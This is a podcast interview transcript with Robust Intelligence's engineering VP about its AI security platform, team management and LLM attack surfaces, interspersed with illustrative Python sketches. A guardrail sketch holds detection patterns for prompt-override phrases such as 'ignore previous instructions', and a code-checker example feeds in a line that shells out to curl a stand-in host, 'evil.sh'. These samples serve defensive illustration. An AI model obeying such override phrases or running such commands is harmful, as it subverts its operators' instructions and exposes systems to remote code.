Robust Intelligence VP Marco Sanvido: Securing LLMs
Kshitij:
Hey everyone, I'm Kshitij, and welcome to another episode of Tractable. Today I have Marco with me, who's the VP of Engineering at Robust Intelligence. Robust Intelligence is a platform for real-time AI security, including products to help with validation of AI models and data. We have a lot to talk about, so I'm really excited to have you here, Marco.
Marco: Same here, very excited, and thank you for inviting me.
Kshitij: Of course. Yeah. So maybe just to dive right in, tell me a little bit about your journey before Robust Intelligence and kind of your career path leading up to where you are today.
Marco: I think we'll take the whole hour... I've been in the industry for a while.
So I started... I did my PhD in Zurich, where we worked on autonomous vehicles and flying autonomous vehicles, and we did a startup there. So my journey in startup land started a long time ago. Then I moved to the US and followed all the technology trends in Silicon Valley: starting from virtualization, then solid state drives, Kubernetes, security, encryption.
I touched a little bit of everything. So I'm an old wolf.
Kshitij: Yeah. And I'm sure you've seen a lot of these trends kind of repeat in different words, so to speak. So one of the things I'm curious about is: what sort of technical challenges over that time have you enjoyed the most and where have you felt like it's the most engaging work for you?
Marco: So I thought about this question for a long time after you sent it to me yesterday, and I must admit that I've touched many different technologies and technology trends, and each of them has interesting challenges. Everything is nice to work on and it's always rewarding.
I wouldn't say there is one specific technology that I can highlight as something that I enjoyed the most. What I enjoy the most are the memories of solving those problems as a team. Those build lifelong friendships, and I think that's more valuable than anything else. You know, I can remember all the problems we had at all the startups, and how we, as a team, got together and solved them.
If you ask me the details of the technical problems we solved, I only vaguely remember. But I remember who was there, you know, how long we worked, and how excited we were when we found a solution. Those are the memories that are still very vivid today.
Kshitij: I think you mentioned, you know, working on things like virtualization and working on different storage technologies. Are there kind of patterns that you're seeing, other than the fact that, you know - you're working with all these great people - that keep popping up every time you face a technical challenge? Like, is there, is there something where you're like: "Oh, it's this again!" and now I know we're going to have to spend the next six months figuring this out because I've seen the story play out.
Marco: So in general, every boom in technology, you know, has been brewing for a long time, right? And then there is something, you know, that kicks in and makes it go viral.
Like virtualization, you know: IBM had it for a long time, and then VMware came along, and then it spread everywhere. Kubernetes, you know, same there. Solid state drives, too: the technology was there for a long time. So there is something that sparks that momentum, and it picks up. LLMs are the same situation, right?
LLMs were, you know, around for a while before OpenAI came and made them very popular.
They get everybody super excited. Everybody jumps in, but then there is some reality, right? And some is a little bit hype. And so the challenge is always filtering out the hype... you know, running a low-pass filter on that high volatility and really zoning in on the real value that this new technology brings to the table.
Kshitij: Yeah. and, and I'm curious for your perspective, on specifically how that relates to AI today. So obviously AI has been around for a very long time. LLMs have been around for a very long time, but we're kind of seeing the uptick of the curve really in the past year, year and a half. Specifically as it comes to consumers, right?
Like enterprises have been excited about ML for probably decades. So give me a sense of... do you think this shift to consumer excitement is something technically novel? Or is it just that the technology has been slowly building up and has hit a threshold where, you know, the excitement is warranted, and it's not just gonna die down in six months with people realizing, well, we're just going to continue in some linear direction for the next two or three years?
Marco: I don't know. I think everybody agrees that this technology is here to stay. So there's no doubt about it. One thing this technology in particular sparked is that everybody's super excited, because it's so well demo-able, right? If you use DALL-E, or if you use OpenAI or ChatGPT, you get wowed immediately, right?
It's like, wow, that's impressive, right? I don't remember any other technology where you said, wow, I'm really amazed, right? The problem, though, is that these technologies are fantastic to demo, and, you know, if it makes a mistake, we laugh about it.
Right? Yeah, but if you want to put that in business-critical applications, you know, you're not going to laugh when it makes a mistake, right? You might be losing dollars. So that's what we try to solve as a company: that particular problem. I think there will come, you know, a point where these LLMs and new ML models will help industries and businesses.
In the consumer world, you know, now we have ChatGPT, and it will slowly pick up more and more. But in the business world, we've used AI for a long time, right? Google was using AI for a very long time without us noticing, right? So the technology there is mature enough.
LLMs in particular come with such a wow factor, but they can also easily, you know, hallucinate. They can be toxic, right? They can make mistakes. And I think it will take a little while before they really enter mainstream businesses, and companies like us are trying to help that transition. It will take a little bit of time.
Kshitij: Yeah. And maybe let's talk a little bit about Robust Intelligence as a product offering. So one of the things you said is that LLMs, and new AI products in general, are very demo-able. But it's interesting, because on the technical side, it feels like they're much less observable, right? For the end consumer, it's like, great: you get a fancy generated output. But on the technical side, you have very little understanding of why it's producing the output it is, and then how to think about the risk factors involved in that. Obviously that's the sort of thing that your platform is trying to solve today. So tell me a little bit about the product, and then we'll dive into the architecture and how the platform is built.
Marco: The platform essentially is a risk management platform for AI models. So we try to identify security problems in the models and in the datasets, surface them to the user, and then help them protect against those vulnerabilities. And especially because observability is a bit complicated, right?
You don't know what the LLM is doing, so you want to protect the inputs and outputs of that model to make sure that it follows, you know, the laws, and that it is not hallucinating. Protecting against all those errors is what we're trying to do.
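To make that concrete, here is a minimal sketch of what guarding a model's inputs and outputs can look like. Everything in it is a hypothetical illustration: the pattern lists, the `guarded_completion` wrapper, and the `call_llm` parameter are invented for this example and are not Robust Intelligence's actual API.

```python
import re

# Hypothetical guardrail sketch; not Robust Intelligence's product API.
INJECTION_PATTERNS = [
    r"ignore (all )?previous instructions",
    r"disregard your system prompt",
]
PII_PATTERNS = [
    r"\b\d{3}-\d{2}-\d{4}\b",   # US-SSN-shaped strings
    r"\b\d{13,16}\b",           # long digit runs (possible card numbers)
]

def violates(text: str, patterns: list[str]) -> bool:
    """True if any pattern matches the text, case-insensitively."""
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)

def guarded_completion(prompt: str, call_llm) -> str:
    # Scan the input before it ever reaches the model.
    if violates(prompt, INJECTION_PATTERNS):
        raise ValueError("prompt blocked: possible injection attempt")
    output = call_llm(prompt)
    # Scan the output before it reaches the application.
    if violates(output, PII_PATTERNS):
        return "[response withheld: possible PII leak]"
    return output
```

Real guardrails go well beyond regexes (classifiers, policy models, and so on), but the shape is the same: checks on both sides of an opaque model.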
Kshitij: Yeah. And so diving into the architecture: tell me how Robust Intelligence is built, and, to the extent you can, give us a sense of some of the interesting parts of the architecture today.
Marco: So when I joined - the company is four years old, right - the team had already built up a lot of know-how in how to test, or red team, those models and identify those risks and vulnerabilities. And so they had built a really fantastic package to identify those issues.
I call that the engine: the core know-how. What we're trying to build as the product is the car around that engine. So the product has this engine that identifies those vulnerabilities and protects against them.
And then the platform is the car around it that we sell to the customer. The platform is a Kubernetes platform, so it's pretty standard - nowadays it's the standard way to develop SaaS applications, right? Ten years ago it was totally different, and who knows in 10 years what the new platform will be.
But currently we're using quite standard development and SaaS architecture for the platform: a Kubernetes platform with multiple microservices for the core functionality. The stress testing runs on dedicated nodes that we spin up using spot instances to reduce cost.
Those spot instances run for half an hour to an hour, depending on the complexity of the computation, and then they shut down. The core engine is mostly Python. Machine learning is a Python world, so that's mostly Python, but the rest of the system is Golang, which is, again, a standard way to develop SaaS applications nowadays.
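As a rough sketch of that pattern with the official Kubernetes Python client: a short-lived Job pinned to spot nodes that cleans itself up after the run. The node labels, tolerations, image, and namespace below are invented placeholders; a real cluster would use its own.

```python
from kubernetes import client, config

def launch_stress_test(run_id: str) -> None:
    """Spin up a short-lived stress-test Job on spot-instance nodes.
    All names, labels, and images here are illustrative placeholders."""
    config.load_kube_config()  # or config.load_incluster_config() inside the cluster

    job = client.V1Job(
        metadata=client.V1ObjectMeta(name=f"stress-test-{run_id}"),
        spec=client.V1JobSpec(
            ttl_seconds_after_finished=600,  # garbage-collect the Job after it ends
            backoff_limit=1,                 # spot nodes can be reclaimed mid-run
            template=client.V1PodTemplateSpec(
                spec=client.V1PodSpec(
                    restart_policy="Never",
                    # Schedule only onto spot nodes (label is cluster-specific).
                    node_selector={"node.kubernetes.io/lifecycle": "spot"},
                    tolerations=[client.V1Toleration(
                        key="spot", operator="Exists", effect="NoSchedule")],
                    containers=[client.V1Container(
                        name="engine",
                        image="registry.example.com/stress-engine:latest",
                        args=["--run-id", run_id],
                    )],
                )
            ),
        ),
    )
    client.BatchV1Api().create_namespaced_job(namespace="stress-tests", body=job)
```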
Kshitij: Yeah, it's interesting, because a lot of the parts you just mentioned could, in some sense, be used in any SaaS application, right? The Kubernetes cluster, the spot instances, even the choice of framework and language. Are there things that you think are specific to Robust Intelligence? Or, to phrase it another way: you really want most things to be boring so that they're predictable and so that you can scale them.
But are there things where you're like, oh, we've put a lot of effort into this, and I think it's very different from other companies, or at least we've had to design our own custom solution because what we would get out of the box just wouldn't work for us?
Marco: So the interplay between the control plane and the data plane - that's also a common architecture in SaaS products.
What's unique about us is the agent: the data plane where the computation is done. That's the core of our company, right? That's the business logic of our company. That's where we put a lot of effort, making sure it's reliable, that it's performing well, and that we can deploy it at the customer, so that the customer - you know, we don't have access to the data - we're keeping the data secure, and the computational costs are on the customer side as well. That's a little bit unique about the architecture. Usually the data plane is minimal: it's just a shim, a small layer, and then all the computation is done in the control plane.
For us, that's a little bit reversed: the heavy computation is done on the data plane that we deploy on the customer side, and the control plane is a bit more lightweight: visualization, you know, user management, security and so forth.
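A hand-wavy sketch of that inversion: an agent inside the customer's VPC pulls work from the control plane and ships back only findings, so raw data never leaves the environment. The endpoints, token handling, and payload shapes are made up for illustration.

```python
import os
import time
import requests

CONTROL_PLANE = "https://control.example.com/api/v1"   # hypothetical endpoint
HEADERS = {"Authorization": f"Bearer {os.environ['AGENT_TOKEN']}"}

def run_tests_locally(job: dict) -> dict:
    """Placeholder for the real engine: heavy computation stays in the VPC."""
    return {"passed": 0, "failed": 0}

def run_agent() -> None:
    """Data-plane agent loop: poll for jobs, compute locally, return results."""
    while True:
        resp = requests.get(f"{CONTROL_PLANE}/jobs/next", headers=HEADERS, timeout=30)
        if resp.status_code == 204:   # nothing queued; back off and retry
            time.sleep(10)
            continue
        job = resp.json()
        findings = run_tests_locally(job)   # customer data never leaves the VPC
        requests.post(
            f"{CONTROL_PLANE}/jobs/{job['id']}/results",
            headers=HEADERS,
            json={"summary": findings},     # only metadata goes back
            timeout=30,
        )
```

Pull-based agents like this also sidestep inbound firewall rules: the customer only needs to allow outbound HTTPS.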
Kshitij: And I always wonder, when the data plane, or the agent deployed within the customer's VPC, has a lot of business logic: does that get hard to debug or update, or to keep functioning the way you want it to function? And then the second question I have is: if something goes wrong in the customer's environment, let's say they cut off a security group, or they run out of some quota on their end and can't deploy it anymore...
Does that ever cause headaches for your team? Maybe those are related in some sense.
Marco: You went straight to the pain. Yes, development gets a little bit harder, because, you know, you want to develop locally on a machine, but now it's a distributed setting on your machine.
You want to make sure that it works on your machine so that development is fast. But once you need to merge your change, you want to test all potential combinations, and there are many: you have different clouds that you want to support, you have different versioning problems that you need to address.
So that gets very complicated very quickly. So that's definitely a headache. Customer support: yes, that's the usual problem. I think it's not unique to us - everybody who deploys in a VPC has the same problem: they need to access the logs, they need to see the metrics.
They need to see what happens on the customer side, but the customer doesn't want to let you in, right? But that's not a unique problem, the observability and debugging in that sense. And thank goodness, you know, there are plenty of tools that simplify that. But yeah, it's definitely on our radar as a problem.
Kshitij: And so architecturally, you have the split of control plane and data plane. I don't know if that's exactly the axis, but how does the architecture of the actual stack dictate how teams are organized internally? Does it happen to align pretty closely to that?
Or have you found a more horizontal way to align teams, just by capability?
Marco: So definitely, you know, that's Conway's law, right? Your team structure defines your software structure. That's 100 percent true. But our teams are pretty small and co-located, so those barriers are a bit less strong. The structure is not totally aligned with the current control plane and data plane split. As we grow, that will become more and more of an issue, and we'll have to structure based on that split to make sure that we can develop in isolation, so that each team is individually fast and is not blocked by those barriers.
It's definitely on our radar, but while the team is small and co-located, those barriers are not as strong, as I said, and we can change the structure of the architecture without having to modify the structure of the engineering teams too much. But as we grow, it will become more and more important.
Kshitij: Kind of continuing on this idea of the data plane being in the customer's environment... one thing that I've seen kind of as a pattern is customers are more hesitant to see the value when they're running the compute, right? Even though all your core business logic, all the stuff that you all are doing, is ultimately the value of the product.
They're running some of the compute and they're also paying their cloud provider. Is that a problem you see where it's a little bit harder to communicate, you know, why you're paying Robust Intelligence what you are?
Marco: So the cost of the compute is not... usually, you know, our customers spend way more on other stuff than on ours.
So we are a drop in their bucket. It's not a pain point. What I appreciate is the fact that, you know, they are in control of all the data governance, right? We don't need to go and access that data, so it makes it way easier for them to deploy our system. On the computational side, if that's a problem, we offer to run it for them, right?
We can bypass that problem. The biggest advantage is that they are in control of it. They can deploy it; they know exactly what's going on. Nowadays, with SOC 2 and all of these security concerns, companies are more concerned about security than they were 10 years ago, right?
So that makes deployment simple for us.
Kshitij: And I'm curious: is there any difference in which architecture companies go with depending on their maturity? Is it that the larger the company, the more you care about data governance, and so you really want it all tightly controlled within your stack?
And then early companies are just like: okay, fine. If it's a SaaS offering, it's a SaaS offering and we can check the boxes of security some other way.
Marco: Yeah, definitely. Though I think it's not so much the size as the vertical the company is in, right? Regulated industries - finance, insurance, healthcare - are, well, regulated. So even a smaller company has to follow those regulations. I would say that is even more important than the size of the company.
Kshitij: So thinking about the architecture, what are the biggest gaps today? Or, you know, what is the team working on improving?
And then also specifically: where are you spending most of your time in terms of guiding the team or providing support?
Marco: So in a startup, the biggest gap is always the one that stands between you and closing the customer, right? So that's the biggest gap, and you're always trying to close it and find the right solution.
So there's always a balance between tech debt and gaps. I can't pinpoint one single pain point, because, you know, depending on the customer and where we are, we have different gaps, and then we work very fast to close gaps as they come in.
There were some architecture choices made two or three years ago that might have been done differently if you were starting from scratch right now. But that's the standard startup problem, right? If you had known all the problems at the beginning, you would have done it differently.
But what I spend most of my time on is... I'm a strong believer that a great product comes from great engineers, right? So the only thing I can do is make sure the engineers are supported and have a fantastic environment to develop in. That means supporting them with the best tools, making sure that the CI/CD pipeline is effective, making sure that collaboration works... You know, there is energizing and de-energizing work, right? I balance that so that the team is effective and efficient. That's what I'm spending most of my time on.
Kshitij: Are there specific metrics that you look at to try to gauge... you know, is your engineering team engaged, are they being efficient? For example, I've heard some folks really look at review time on pull requests, right? That's maybe one metric of: are people getting back to each other quickly, or are they spending most of their time blocked and waiting on others? Are there metrics like that that you actively look at, or do those just get gamed over time, so it's more of a gut feeling?
Marco: So there was a famous article floating around the web about how to measure performance. I think McKinsey tried to do something and they got really bad press for it. But I totally believe that the most important thing that people do, especially at a startup, is impact.
So how do they have impact... how do they move the needle, right? It could be one single line of code, right? And impact is, you know, not a metric that you measure, but you kind of know, right? Somebody who is moving the needle in the right direction for the company knows the important problems, knows the priorities, knows what is important to the company at that particular point in time.
You know, it's pretty easy to spot who is moving the needle and who is more in a supporting role. All the metrics that you mentioned are like debugging: you look at logs to see where the problems are, right? But you don't look at the logs to judge how well your software is working, right?
Commits, PR reviews, all that stuff: if somebody is not having a lot of impact in the company, you can use them to kind of debug, find problems, and root-cause the problem. The goal is always to make everybody as productive as they can be.
I think everybody has real potential. When we hire people, it's because we believe they have great potential. So we need to make sure that they are supported and can be as effective and as productive as they can be, right? People go through phases, too. There are phases where somebody is really productive.
And then, you know, something happens... the kids are up the whole night. Life is not a straight line, right? So we have to adapt to that as well. One thing on the metrics side that you mentioned: this past quarter I started trying to measure engineering effectiveness, or - how can I say - engineering maturity. There are maturity levels, and there is an organization, Engineering X, that published a survey with a set of metrics that you can measure your engineering org against. I'm trying that to get a sense of where we are as an engineering org on a maturity level. It doesn't measure people's performance; it's a measure of you as an org.
What can you do to be even more mature, move faster, and support the engineering org to be more effective? I just started doing that, and I'm collecting the results right now. So, yeah, it'll be a surprise when the numbers come in, but looking at it, I've got a good feeling that there's a good balance of really useful metrics that can help guide the engineering org.
Kshitij: One of the things you said was that you try to kind of look at balancing between what the product needs to fill customer needs, as well as, you know, the roadmap you have and the things you've planned for the year or a quarter, let's say, right? So how do you think about how that affects engineering engagement?
Because, you know, one of the narratives is that lots of people want to work on exciting new things: the roadmap work that's really going to contribute new things to the product. But the reality of startup life, as you're saying, is there are things customers want, and you need to fill those gaps. Sometimes those are not going to be the most exciting.
How do you strike that balance? And do you think that has an impact on the engagement of the engineers who are working on enterprise-readiness things again and again, or even just small features that maybe don't seem that exciting, at the end of the day, to everyone who's using the product?
Marco: I think the people who join a startup are people who are looking for that excitement and that adrenaline rush of helping customers. So that's already a little bit self-selecting. People want to work with customers and help them out, right? But you also have to find a balance: you cannot just work for the customer, or you become a professional services company, right?
So you balance between making the customer happy and the long-term vision of the company, and you make sure that all the solutions you're building for a particular customer have impact on the long-term plan, right? Otherwise, you shouldn't do it. You should say: I'm not going to do that.
So you have to find a balance. Then there is the other balance, because you're moving very fast. As a startup, you know, the only advantage you have against big companies is that you're moving way faster than they can, right? For all the reasons, you know, we can move way faster than them.
That's why startups have a competitive advantage. But by moving fast, you're creating a lot of dust behind you, right? And that dust has to settle somehow, and sometimes you have to go and clean it up. So that's always a balance. When you decide what you have to do next, you have to choose between, you know, critical customer issues, the long-term vision - the big roadblocks you're working on - and cleaning up a little bit of the dust that you left behind over time. And sometimes... at one of the startups I worked at before, we had built up so much dust that we had to start a parallel team that was basically writing v2 while we were still shipping v1, knowing that in six months v2 had to replace v1.
So yeah, we had to do that, because you still have to sell the product. That's the rare situation where you have to do this. Sometimes you can do it incrementally and change the engine while the airplane is flying.
Kshitij: One of the unique positions that I think you all are in is having started a few years ago.
I'm sure the company has kind of seen a shift in the industry because I imagine the AI security landscape or even just generally working with customers who care a lot about AI has changed a lot since the introduction of LLMs. What's kind of your perspective on that? How have companies or even just industry practices changed over the last couple of years?
Marco: So the good news for Robust Intelligence: when the company was started four years ago, the founders had a fantastic vision that this problem was only becoming more and more important, right? So, you know, yesterday's White House announcement was just preaching to the choir for us.
But there's been a quite dramatic shift in the past years in how companies leverage AI. Before, a lot of companies were using AI, you know, and they had data science teams. They were building their own models, right? They put them in production, and we've seen a lot of successes and companies doing really well by following that path. With this boom of LLMs - and also because of the economic situation, right - some companies are shifting from building their own models to leveraging foundational models.
So the idea is: why should I build my own when I can just build my application on top of these foundational models that are incredibly capable? So we have seen that shift. Personally, I believe that at some point people will move back, because, you know, right now the foundational model is a hammer and everything is a nail.
There will probably be smaller models, better models, to handle some of the particular problems that companies have. But we have seen the transition. Luckily for us, we're testing models: whether the model is built by the company itself or is a foundational model doesn't change much for us, right?
The vision was solid and robust enough to serve us... not just survive, but, you know, be useful in both situations. So, yeah, we're in a good spot in that sense, but we have seen that transition quite dramatically in the people we're talking to.
Kshitij: And I imagine the pain point is actually much worse because if you're not building the model, you pragmatically have less experience understanding the model and understanding its limitations and how it's going to act in certain situations.
What I'm guessing is that the level of experience with the model has decreased dramatically as you've outsourced a lot of the early training. And maybe now all you're doing is either nothing but prompt engineering, or maybe fine-tuning, but you don't have the depth of experience that a company might have had two years ago.
Is that, is that right?
Marco: That's totally right. Yeah. Building a model is not trivial. You have to have the data, you have to train it and verify it and make sure that the model is doing the right thing. So it takes a lot of effort, right?
And the people building those kind of understand the model and have confidence that the model is doing what it's supposed to do. When you're leveraging somebody else's model, you know, you can test it a little bit, but you have to have the trust that the model is doing the right thing all the time.
Yeah, that's what we try to solve, right? We come in and build tools that allow you to build that confidence, to build that trust in the external models, so that in business-critical applications you're not making mistakes.
Kshitij: And do you think that changes the overall security threat level?
Because one story I can imagine is everyone's using these models, but these models have been through a bunch of exercises where they've been stress tested, and there's a lot of hard work being put into locking them down. On the other hand, they're much more powerful, right, than maybe a model someone would have trained two years ago, and so a little bit harder to kind of scope what the security risks are.
You know, on balance, do you think we're in a worse place or a better place, given how the ecosystem has shifted?
Marco: I think it's worse, right? Because LLMs are so capable, it's simply easier to find holes and bypass them. That's why I think what we're doing is extremely important: locking down those LLMs to make sure that they're doing what they're supposed to do.
By design, those LLMs can do a lot of things, and, you know, you can try to abuse them, right? Because they can do more than what they're supposed to do. If you build a model that predicts, let's say, house prices, or predicts whether somebody's a good hire or not, right?
An attacker could try to make it give the wrong answer, right? But they cannot make it toxic or extract PII data. You can't do that stuff. With an LLM, an attacker could force your LLM to write code that executes and does something inside your network, right?
So the attack surface is way, way bigger with LLMs.
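A toy illustration of that difference: a narrow tabular model can only ever return a number, so abuse is bounded, while an LLM whose output gets executed means the output itself must be policed. The denylist below is a deliberately crude stand-in for real sandboxing.

```python
import ast

# A narrow model's output space is tiny; the worst case is a wrong number.
def price_model(features: dict) -> float:
    return 100_000 + 50 * features.get("sqft", 0)

# An LLM that writes code which then runs is a different story: a
# prompt-injected model could emit code that touches the network or
# exfiltrates data, so generated code has to be checked before it runs.
FORBIDDEN = (ast.Import, ast.ImportFrom)  # toy policy, not a real sandbox

def safe_to_run(generated_code: str) -> bool:
    """Reject generated code containing imports (illustrative only)."""
    try:
        tree = ast.parse(generated_code)
    except SyntaxError:
        return False
    return not any(isinstance(node, FORBIDDEN) for node in ast.walk(tree))

print(safe_to_run("print(2 + 2)"))                          # True
print(safe_to_run("import os; os.system('curl evil.sh')"))  # False
```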
Kshitij: Do you think then that most people still underestimate the security risks of LLMs? And maybe as a corollary, do people underestimate the power and creativity of the LLMs? Or where do you think we are on that spectrum?
Marco: I think there is a bimodal distribution. There are people who really, really understand the problems and really know the potential and the real impact of this, right? That's why there are people very concerned about this, trying to deploy a solution like ours, or, you know, the White House with the executive order, right?
And then there are people who think: oh, it's just a new toy. Like yesterday, I went to a presentation by somebody: "They just do language, right? It's just a glorified dictionary." And I was like, you're reducing it too much, right?
Because they can execute code in some settings, right? They can really be powerful if they're not handled correctly. So I think there are people who really understand it, and people who haven't fully grasped it. They're dismissing it.
Kshitij: So let's talk a little bit about how you all use LLMs internally. So obviously you're supporting the ecosystem in very important ways, but what's the internal use case for LLMs? How has that picked up in the engineering org or maybe across the company?
Marco: So obviously, you know, we are an AI company, so if we don't embrace LLMs, who else will?
With a security eye on it, right? We use code-assist generation quite heavily internally. It goes back to the engineering discussion: I think it's of tremendous value to the engineering team. Remember when I spoke about energizing and de-energizing work? It reduces the amount of de-energizing work.
Like writing tests, for example. As an engineering manager, it's always been: "did you write the test for that?" I ask that very often, right? Now we do that with a generative assistant. I don't know the name of the company we're using, but they're really, really helpful.
You say: write me a test for that, and boom, it gives you the skeleton and you're ready to go. That's definitely a fantastic use of the technology. When it makes mistakes - because it makes mistakes, and sometimes funny ones - you can spot them quickly and fix them, right?
So I think it's a perfect use of that technology internally. And then we leverage LLMs for a bunch of other things internally as well: helping us debug, helping drive some of our protections, and so forth. So yeah, we're spending a lot of money on LLMs.
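For flavor, this is the sort of skeleton a code assistant typically hands back when you ask "write me a test for that". The function under test, `normalize_scores`, and its module are made up for the example.

```python
import pytest

# Hypothetical function under test, invented for this illustration.
from mypackage.scoring import normalize_scores

def test_normalized_scores_sum_to_one():
    assert sum(normalize_scores([1.0, 3.0])) == pytest.approx(1.0)

def test_normalization_preserves_order():
    out = normalize_scores([1.0, 3.0])
    assert out[0] < out[1]

def test_empty_input_is_rejected():
    with pytest.raises(ValueError):
        normalize_scores([])
```

The skeleton is the de-energizing part; deciding which behaviors are worth pinning down is still on the engineer.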
Kshitij: One thing I always found interesting about the code-output use case: on one hand, it's beneficial that it's outputting code that you can observe. You can see what mistakes it's making and you can fix them. On the other hand, let's say you had more trust in what it was doing. It doesn't need to output something that you can read, right?
Like, let's say you could just formally verify that the test it wrote tested the functionality you want, and it's outputting some compiled code or some artifact that you can't inspect. Do you think we're eventually going to get there, or do you think we're always going to be outputting human-verifiable code, something in characters that we can understand?
Marco: No, we are going there, right?
Where the LLM will spit out code and nobody's checking it, right? And thank goodness, you know, we have a long history of checking code - compilers, static analyzers, virus scanners - that can give confidence that what the LLM spits out is not dangerous, right?
So I think we're going to get there. I think, though, that will mostly be for the boundary code: all the last-mile connections, like doing the integration that reads the logs from Datadog, those last-mile connections where you have APIs and you know how to write against them. It's just typing, and LLMs, I think, can do it very well and will do it very well.
The core components, like what we are doing - there's a lot of creativity that goes into them, a lot of thinking. LLMs can assist you, maybe give you the initial step of an idea. But if you want to be original, you still need people to do that. And also, I forgot to say this earlier, but I believe that if everybody has it, nobody has it.
As a competitive advantage, right? If you're building a startup, especially a startup like ours building something new and state of the art, and you leverage LLMs to build the core of your company... then, you know, you're on a little bit of shaky ground, because everybody has it, right?
So it's not unique. That's why I believe the core will, forever I think, not be auto-generated, but will be manually created through creativity.
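The Datadog integration he mentions is a good picture of what "boundary code" looks like: a thin, well-documented API call that is mostly typing. Here's a rough sketch against Datadog's public v2 Logs Search endpoint; the query, field names, and environment variables are placeholders, so check the API docs before relying on it.

```python
import os
import requests

def fetch_recent_error_logs(query: str = "status:error") -> list[dict]:
    """Last-mile integration: search the past 15 minutes of logs via
    Datadog's Logs Search API (v2). Keys come from the environment."""
    resp = requests.post(
        "https://api.datadoghq.com/api/v2/logs/events/search",
        headers={
            "DD-API-KEY": os.environ["DD_API_KEY"],
            "DD-APPLICATION-KEY": os.environ["DD_APP_KEY"],
        },
        json={
            "filter": {"query": query, "from": "now-15m", "to": "now"},
            "page": {"limit": 25},
        },
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json().get("data", [])
```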
Kshitij: And the use case I'm thinking of, exactly like you said, is at the boundary. If you want an LLM to change some copy on your marketing site, one very local implementation is, you know, it outputs a pull request.
Someone has to go and merge it or look at the CSS it generated, but none of that really matters, right? It can just do whatever it wants and no one ever has to look at the code it output. As long as the website looks good, then you're done.
Marco: I totally agree. Yeah.
And also where the mistakes are not fatal, right? Where the mistakes are easily undoable. So for that stuff, I think LLMs will be a fantastic accelerator for what you're doing as a startup. For the core, we're far away from LLMs being there. And, you know, everybody says AGI, but if AGI is there, everybody will have AGI.
So what's the competitive advantage for a startup? So that's why I still believe that to be successful, a startup has to do something that is really fundamental and state of the art. No LLM can do that.
Kshitij: Okay, great. To wrap us up, what are you most excited about let's say in the coming few years, whether it's at Robust Intelligence or maybe just as an industry on the AI side? What sort of technical advancement are you most looking forward to?
Marco: Definitely, you know, I want to see where exactly we end up with the hype, and where we see real productivity and LLMs having a humongous impact.
I believe we are at the tip of the iceberg right now. I've never seen a technology move so fast, right? Every day I go on Twitter and I see something new: a new paper or a new discovery or something mind-blowing. It's amazing how fast we're moving.
So that excites me. I've been in startups for quite a few years now, and it's always a journey. That's the thing that excites me the most: it's an adventure. The goal is not to have a fantastic exit. Obviously, you know, it's a lottery ticket; we hope it's fantastic.
But it's the journey, right? It's the memories you make, the friendships you make along the way. At all the startups I've been at, I've made a ton of friendships. I had a ton of fun. I have fond memories of all those adventures, even when the company didn't succeed, right?
But it's been always fun and nothing is more rewarding than working with fantastic people in a small team or solving something that is unique.
Kshitij: Well, maybe the one definite positive output is that with these LLMs, and AI technology generally, it does seem like there are gonna be more startups, right?
There are gonna be more small teams who are able to build products and bring them to market. And whether or not there's a hype cycle, and whether all of these companies exit exactly the way they want, there will be more companies out there trying to build better products.
Hopefully bringing them to consumers.
Marco: Yeah, super exciting. The number of startups that have been built around these new technologies is impressive. I've never seen anything like it - maybe in 2000, you know, when the Internet really boomed, right? We saw a little bit of over-investment then, right?
I believe we are in a similar situation, where, you know, some funding goes to startups whose business model might not be really solid. But you have to try 100 things to make one successful, right? So I think exciting things are ahead of us for sure.
Kshitij: Awesome. Well, on that note, thanks Marco for coming on the podcast today and really appreciate your time.
Marco: My pleasure. My pleasure. Hope this was interesting and not too boring. Yeah, thanks again for inviting me.